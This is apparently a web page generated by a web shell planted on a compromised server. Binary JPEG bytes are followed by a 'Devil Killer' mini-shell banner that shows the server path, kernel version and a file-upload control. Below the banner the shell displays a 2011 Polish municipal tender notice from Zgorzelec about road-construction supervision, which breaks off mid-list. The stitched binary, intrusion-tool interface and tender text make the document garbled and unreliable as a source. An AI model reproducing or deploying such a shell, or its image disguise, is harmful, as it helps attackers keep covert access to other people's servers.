JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110509/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110509/104912-N-2011.html

<p class="kh_header"><b>Zgorzelec: Pełnienie funkcji Inspektora Nadzoru Inwestorskiego na zadaniu pod nazwą Budowa drogi na Przedmieściu Nyskim</b><br>
<b>Numer ogłoszenia: 104912 - 2011; data zamieszczenia: 09.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru Inwestorskiego na zadaniu pod nazwą Budowa drogi na Przedmieściu Nyskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na powołaniu Zespołu Inspektorów 
    Nadzoru Inwestorskiego w imieniu i na rzecz Zamawiającego,  nad wykonaniem robót 
    budowlanych pod nazwą Budowa drogi na Przedmieściu Nyskim, w następujących 
    branżach:
a)	drogowej 
b)	instalacyjnej w zakresie sieci i instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, 
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych. 
2. Zakres prac  obejmuje nadzór inwestorski nad budową ciągów pieszo-jezdnych, jezdni, 
    chodników, miejsc postojowych, oświetlenia, odwodnienia wraz z odprowadzeniem wód 
    opadowych do istniejącej kanalizacji deszczowej oraz zagospodarowanie terenu 
    o następujących powierzchniach i ilościach: 
    a) jezdnia - 3.953,00m2 , 
    b) chodniki - 2.520,00m2 , 
    c) miejsca postojowe - 1.425,00m2 , 
    d) ciąg pieszo-jezdny - 464,90m2 , 
    e) zieleń (trawniki) - 286,00m2, 
    f) łączna długość kanałów deszczowych - 268,20 mb, 
    g) łączna długość przykanalików -  71,60 mb, 
    h) studnie rewizyjne - 10 szt., 
    i)  studnie ściekowe z wpustami ulicznymi 19 szt. 
3. Nawierzchnie jezdni, ciągów pieszo-jezdnych, chodników i miejsc postojowych 
    wykonane będą z kostki kamiennej granitowej i płyt kamiennych granitowych. 
4. Zakres prac obejmuje również pełnienie nadzoru inwestorskiego nad budową oświetlenia 
    drogowego w ilości 29 szt. lamp stylizowanych oraz sieci kanalizacji deszczowej. 
5. Teren, na którym prowadzone będą roboty budowlane obejmuje  strefę ochrony konserwatora 
    zabytków i archeologiczną. 
 6. Szczegółowy zakres robót dla zadania objętego nadzorem inwestorskim został zawarty  
    w dokumentacji projektowej składającej się z projektu budowlanego, dokumentacji 
    geotechnicznej podłoża gruntowego, specyfikacji technicznej wykonania i odbioru robót 
    budowlanych, projektu stałej organizacji ruchu drogowego  - załącznik nr 8 do SIWZ. 
7. Zamawiający wymaga, by Nadzór  Inwestorski nad robotami budowlanymi pełnił 
        Zespół Inspektorów Nadzoru Inwestorskiego pod kierownictwem Koordynatora.
7.1 Zamawiający określa, następujący skład  Zespołu Inspektorów Nadzoru Inwestorskiego:
        a) Inspektor Nadzoru w specjalności drogowej, 
        b) Inspektor Nadzoru w specjalności instalacyjnej w zakresie sieci,  instalacji i 
            urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i 
            kanalizacyjnych,  
        c) Inspektor Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji 
            i urządzeń elektrycznych i elektroenergetycznych.
7.2 Zamawiający dopuszcza by funkcję Koordynatora pełnił jeden z inspektorów robót
     zgodnie z posiadanymi uprawnieniami. 
7.3 Zobowiązuje się Wykonawcę do wskazania w ofercie, który z Inspektorów 
      wchodzących w skład Zespołu Inspektorów Nadzoru Inwestorskiego pełnić będzie 
      funkcję Koordynatora - Załącznik Nr 6 do SIWZ. 
8.   Zaleca się, aby Wykonawca dokonał oględzin terenu związanego z realizacją 
      przedmiotu zamówienia, dokładnie zapoznał się z treścią dokumentów przetargowych, 
      celem prawidłowego sporządzenia oferty oraz właściwego wykonania przedmiotu 
      zamówienia.  Wizję lokalną  Wykonawca dokona na   koszt własny. 

9. Do zadań Koordynatora i Zespołu Inspektorów Nadzoru Inwestorskiego należeć będzie: 

1)	świadczenie usługi nadzoru inwestorskiego w imieniu i na rzecz Zamawiającego, obejmujące czynności wynikające z ustawy  z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity z 2010r. Dz. U. Nr 243, poz. 1623 z późn.zm.),  
2)	koordynacja prac zespołu nadzoru inwestorskiego, w tym koordynacja prac z nadzorem archeologicznym, 
3)	protokolarne przekazanie Wykonawcy robót budowlanych przy udziale Zamawiającego placu budowy, 
      4) 	przekazanie Wykonawcy Dziennika Budowy i bieżące pisemne weryfikowanie 
            zapisów w Dzienniku Budowy, 
5)	nadzór nad prawidłowością dokumentowania robót związanych z wywożeniem i 
      składowaniem lub utylizacją materiałów odpadowych i pochodzących z rozbiórki w 
      ramach realizowanych robót budowlanych, 
6)	weryfikacja przedkładanych przez Wykonawcę robót budowlanych potwierdzeń zagospodarowania odpadów, zgodnie z powszechnie obowiązującymi przepisami, 
7)	wydawanie Wykonawcy robót budowlanych, wszystkich poleceń na piśmie, 
8)	przejęcie, sprawdzenie i przekazanie Wykonawcy punktów głównych geodezyjnych, 
9)	obecność Inspektora w specjalności  drogowej, instalacyjnej w zakresie sieci, i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych na terenie budowy, podczas prowadzenia robót budowlanych w zakresie ich nadzoru, nie rzadziej niż raz w tygodniu, a także na każde wezwanie Zamawiającego i Wykonawcy robót budowlanych. Obecność Koordynatora na terenie budowy przynajmniej raz w tygodniu, 
10)	rozwiązywanie bieżących problemów technicznych w trakcie realizacji zadania, 
11)	uzgadnianie niezbędnych zmian w dokumentacji projektowej z jej autorem oraz 
wnioskowanie do Zamawiającego o wprowadzenie ich przez projektanta w ramach nadzoru autorskiego, jeżeli zajdzie konieczność zmian, 
12)	opiniowanie harmonogramu rzeczowego robót, sporządzonego przez Wykonawcę 
robót budowlanych, 
13)	monitorowanie postępu prac poprzez porównywanie postępu faktycznego z zaaprobowanym harmonogramem rzeczowym robót budowlanych, 
14)	upewnienie się przed rozpoczęciem robót budowlanych, że spełnione zostały wymagania dotyczące  bezpieczeństwa ruchu (obejmujące też poruszanie się po terenie budowy) oraz, że prace budowlane zorganizowano z uwzględnieniem zasad bezpieczeństwa i ochrony zdrowia, 
15)	wyegzekwowanie  od Wykonawcy robót budowlanych zabezpieczenia przeciwpożarowego na terenie budowy oraz utrzymania ogólnego porządku na budowie, 
16)	zapewnienie, aby były przestrzegane przedsięwzięcia dla ochrony środowiska w czasie budowy i po wykonaniu obiektów stałych, 
17)	zatwierdzenie ewentualnych rysunków roboczych Wykonawcy robót budowlanych i niezbędnych korekt tych rysunków, 
18)	zaopiniowanie przygotowanego przez Wykonawcę robót budowlanych projektu organizacji ruchu na czas trwania budowy, 
19)	kontrolę źródeł pozyskania materiałów oraz uprawnień i świadectw potwierdzających umiejętność personelu realizującego roboty  np. obsługę maszyn, 
20)	zatwierdzenie atestów i receptur przedstawionych przez Wykonawcę robót budowlanych, 
21)	przed wbudowaniem stosownych materiałów, sprawdzenie w zakresie dopuszczenia do stosowania w budownictwie zgodnie z wymogami określonymi w art. 5 ustawy z dnia 16.04.2004r. o wyrobach budowlanych (Dz.U. Nr 92. poz.881 z późn.zm.), 
22)	kontrola nad jakością wykonywanych robót, 
23)	wydawanie poleceń usuwania efektów robót, wykonywanych niewłaściwie lub poniżej standardu, 
24)	kontrola jakości robót w zakresie zgodności z dokumentacją projektową, normami i specyfikacjami technicznymi, 
25)	dokonywanie odbiorów robót zanikających i ulegających zakryciu, 
26)	przygotowywanie dla Zamawiającego okresowych, pisemnych sprawozdań, zawierających informacje dotyczące ilości i zakresu realizowanych robót oraz działalności nadzoru inwestorskiego w formie uzgodnionej z Zamawiającym. Sprawozdania należy przedłożyć Zamawiającemu w ciągu 3 dni po zakończeniu każdego pełnego miesiąca, 
27)	przygotowywanie dla Zamawiającego końcowego sprawozdania z realizacji robót i przekazanie go Zamawiającemu na pięć dni przed planowanym terminem zakończenia robót budowlanych, jednak  nie później niż w dniu odbioru końcowego, 
28)	weryfikacja i zatwierdzenie przedłożonego przez Wykonawcę robót budowlanych, harmonogramu rzeczowo finansowego  realizacji robót, 
29)	organizowanie, minimum raz w tygodniu, rad budowy dotyczących postępu robót z udziałem Zamawiającego, Wykonawcy robót i Inspektorów poszczególnych branż, oraz sporządzenie protokołu z tych spotkań, 
30)	prowadzenie korespondencji z Wykonawcą robót budowlanych i Zamawiającym, 
31)	weryfikacja rysunków powykonawczych dostarczonych przez Wykonawcę robót, 
32)	weryfikacja robót zinwentaryzowanych na geodezyjnych mapach powykonawczych, 
33)	weryfikacja i zatwierdzenie przygotowanych przez Wykonawcę robót budowlanych dokumentów, wymaganych do zgłoszenia  zakończenia budowy do organu nadzoru budowlanego, 
34)	organizacja  oraz przeprowadzanie odbiorów poszczególnych etapów robót a także odbioru końcowego tj. podjecie wszelkich niezbędnych czynności dla prawidłowego przeprowadzenia w/w odbiorów z udziałem Zamawiającego, Wykonawcy robót
i Inspektorów Nadzoru Inwestorskiego poszczególnych branż, 
35)	dokonywanie raz w roku przeglądów technicznych, w okresie gwarancji oraz przeglądu pogwarancyjnego przy współudziale Wykonawcy robót i Zamawiającego, 
36)	rozliczenie Wykonawcy robót budowlanych pod względem rzeczowo-finansowym poprzez:
a) sporządzenie protokołów odbioru poszczególnych etapów robót, 
b) sprawdzanie przejściowych świadectw płatności oraz końcowego świadectwa 
    płatności przed ich zatwierdzeniem przez Zamawiającego, 
      37) przygotowanie świadectw wykonania i przejęcia robót budowlanych oraz elementów 
            wbudowanych, 
38)	sporządzanie wniosków o naliczenie Wykonawcy robót budowlanych, kar umownych 
      zgodnie z zapisami umowy o roboty budowlane  i przekazywanie ich Zamawiającemu, 
39) dostarczanie Zamawiającemu dokumentów i informacji w terminach przez niego 
      ustalonych, w przypadku sporów sądowych i innych sporów oraz spraw wynikających 
      z realizacji inwestycji, 
40) przygotowanie materiałów i udział w spotkaniach organizowanych przez 
      Zamawiającego z przedstawicielami mediów, 
41) Współpraca z Zamawiającym w przygotowywaniu danych, w zakresie:
       a) wnioskowania Beneficjenta o płatności, 
       b) okresowych sprawozdań i sprawozdania końcowego  z realizacji projektu, 
c) innych informacji wymaganych przez instytucję zarządzającą. 
10. W zakres prac objętych  nadzorem inwestorskim wchodzi również wprowadzenie docelowej 
      organizacji ruchu w oparciu o przekazany przez Zamawiającego zatwierdzony project stałej 
      organizacji ruchu. 
11. Zaleca się, aby Wykonawca dokonał oględzin terenu związanego z realizacją przedmiotu 
      zamówienia, dokładnie zapoznał się z treścią dokumentów przetargowych, celem 
     
      prawidłowego sporządzenia oferty oraz właściwego wykonania przedmiotu zamówienia.  
      Wizję lokalną  Wykonawca dokona na   koszt własny..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.54.00.00-5, 71.52.00.00-9, 71.63.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości 1400,00 zł. PLN 
    (słownie:  jeden tysiąc czterysta zł.)               
2. Wadium wnosi się przed upływem terminu składania ofert. 
3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
    przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
    ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
    wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
    wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.






4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  
    formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1, lub pełnomocnictw.  
5. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
    wniesienie wadium do Zamawiającego.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
    O/Zgorzelec.
    Na przelewie należy  umieścić informację :
    Wadium na Pełnienie funkcji Inspektora Nadzoru Inwestorskiego na zadaniu pod 
    nazwą Budowa drogi na Przedmieściu Nyskim                             
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
    najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
    którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 12 
    SIWZ. 
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
    zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
    oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
    ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
     zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
     ostatecznego rozstrzygnięcia protestu jego oferta została wybrana jako 
     najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
     Zamawiającego. 
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
     pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
     za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
     że udowodni, ze wynika to z przyczyn należących po jego stronie. 
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
     oferta  została wybrana :
     a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
         określonych w ofercie, 
     b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
     c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
         przyczyn   leżących  po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
      w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
      określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 

 2/ Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
      spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.

 3/ Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
      spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
       z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   

Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż zrealizował: 

usługi pełnienia nadzoru inwestorskiego,  nad wykonaniem co najmniej dwóch 
robót budowlanych, polegających na budowie, przebudowie lub remoncie 
nawierzchni dróg z kostki kamiennej lub płyt kamiennych wraz z oświetleniem i 
kanalizacją o łącznej wartości robót nie mniejszych niż  3.000.000,00 zł.      
Elementy składowe tego warunku (budowa, przebudowa lub remont  
nawierzchni drogi z kostki kamiennej lub płyt kamiennych wraz z oświetleniem i 
kanalizacją)  zostaną uznane za spełnione, jeżeli były zrealizowane w jednym 
kontrakcie przez Zespół Inspektorów Nadzoru Inwestorskiego. 
Uwaga!
W przypadku składania oferty przez Wykonawców występujących wspólnie, 
w/w  warunek, musi spełnić co najmniej jeden z przedsiębiorców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1/ Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
    w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
    określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2/ Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
    spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3/ Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
Zamawiający wymaga by:
a) minimum 1 osoba, która będzie pełnić funkcję inspektora nadzoru, 
    posiadała prawo wykonywania samodzielnych funkcji technicznych 
    w budownictwie do kierowania robotami budowlanymi w specjalności 
    drogowej bez ograniczeń,  
    
b) minimum 1 osoba, która będzie pełnić funkcję inspektora nadzoru, posiadała 
     prawo do kierowania  robotami budowlanymi w specjalności instalacyjnej w   
     zakresie  sieci,  instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, 
     wodociągowych i kanalizacyjnych bez ograniczeń, 
   
c) minimum 1 osoba, która będzie pełnić funkcje inspektora nadzoru, posiadała 
    prawo do wykonywania samodzielnych funkcji technicznych w budownictwie 
    do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie 
    sieci, instalacji i urządzeń elektrycznych  i elektroenergetycznych bez 
    ograniczeń,  
 Uwaga!
W przypadku składania oferty przez Wykonawców występujących wspólnie, w/w     
 warunek, musi spełnić co najmniej jeden z przedsiębiorców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty: 
1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum), 
